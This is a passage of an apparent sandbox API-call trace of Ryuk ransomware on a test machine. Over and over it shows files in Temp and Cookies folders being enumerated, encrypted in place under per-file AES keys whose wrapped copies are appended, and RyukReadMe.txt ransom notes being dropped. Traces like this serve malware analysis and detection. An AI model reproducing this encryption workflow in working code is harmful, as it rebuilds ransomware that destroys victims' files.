dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.250] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x845d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x8460) returned 1 [0143.250] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.250] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8460, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x8460, lpOverlapped=0x0) returned 1 [0143.250] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.250] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.250] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.250] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.250] CloseHandle (hObject=0x190) returned 1 [0143.266] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.276] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.276] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.276] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.276] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.276] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\C5t688_rQzw.png", dwFileAttributes=0x80) returned 1 [0143.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\C5t688_rQzw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\c5t688_rqzw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.276] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=77474) returned 1 [0143.276] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=77474) returned 1 [0143.277] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x12d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.277] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.277] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.277] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.277] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.278] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.278] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12ea2, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x12ea2, lpOverlapped=0x0) returned 1 [0143.279] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.279] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12ea2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12eb0) returned 1 [0143.279] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.279] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12eb0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x12eb0, lpOverlapped=0x0) returned 1 [0143.279] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.279] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.279] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.280] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.280] CloseHandle (hObject=0x190) returned 1 [0143.295] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.299] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.299] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.299] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.299] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.299] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CaKT.png", dwFileAttributes=0x80) returned 1 [0143.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CaKT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cakt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.300] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=12589) returned 1 [0143.300] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=12589) returned 1 [0143.300] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x300b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.300] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.301] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.301] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.301] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.301] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.301] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x312d, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x312d, lpOverlapped=0x0) returned 1 [0143.301] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.301] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x312d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x3130) returned 1 [0143.301] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.302] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3130, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x3130, lpOverlapped=0x0) returned 1 [0143.302] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.302] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.302] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.302] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.302] CloseHandle (hObject=0x190) returned 1 [0143.329] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.333] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.333] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.333] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.334] SetLastError (dwErrCode=0x0) [0143.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.334] GetLastError () returned 0x0 [0143.334] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0143.335] CloseHandle (hObject=0x190) returned 1 [0143.335] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.339] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.339] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.339] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.339] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat", dwFileAttributes=0x80) returned 1 [0143.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.340] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=16384) returned 1 [0143.340] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=16384) returned 1 [0143.340] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x3ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.340] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0143.341] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.341] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0143.341] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.341] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.341] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x4000, lpOverlapped=0x0) returned 1 [0143.342] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0143.342] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4010) returned 1 [0143.342] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.342] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x4010, lpOverlapped=0x0) returned 1 [0143.343] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0143.343] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.343] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.343] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0143.343] CloseHandle (hObject=0x194) returned 1 [0143.358] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.362] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.362] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.363] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.363] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.363] SetLastError (dwErrCode=0x0) [0143.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.364] GetLastError () returned 0x0 [0143.364] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0143.364] CloseHandle (hObject=0x190) returned 1 [0143.364] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.365] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\cyl6MabE2leS dAj.pdf", dwFileAttributes=0x80) returned 1 [0143.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\cyl6MabE2leS dAj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cyl6mabe2les daj.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.365] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=57094) returned 1 [0143.365] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=57094) returned 1 [0143.365] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xdde4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.365] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.366] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.366] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.366] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.366] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.366] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdf06, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xdf06, lpOverlapped=0x0) returned 1 [0143.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xdf06, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xdf10) returned 1 [0143.367] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.367] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdf10, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xdf10, lpOverlapped=0x0) returned 1 [0143.367] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.367] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.367] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.368] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.368] CloseHandle (hObject=0x190) returned 1 [0143.383] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.388] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.388] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.388] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.388] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.388] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\E-p25XPvU-IDXfy.wav", dwFileAttributes=0x80) returned 1 [0143.388] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\E-p25XPvU-IDXfy.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\e-p25xpvu-idxfy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.388] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=80103) returned 1 [0143.389] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=80103) returned 1 [0143.389] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x137c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.389] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.389] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.389] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.389] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.389] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.389] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x138e7, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x138e7, lpOverlapped=0x0) returned 1 [0143.391] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.391] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x138e7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x138f0) returned 1 [0143.391] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.391] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x138f0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x138f0, lpOverlapped=0x0) returned 1 [0143.391] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.391] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.391] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.391] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.392] 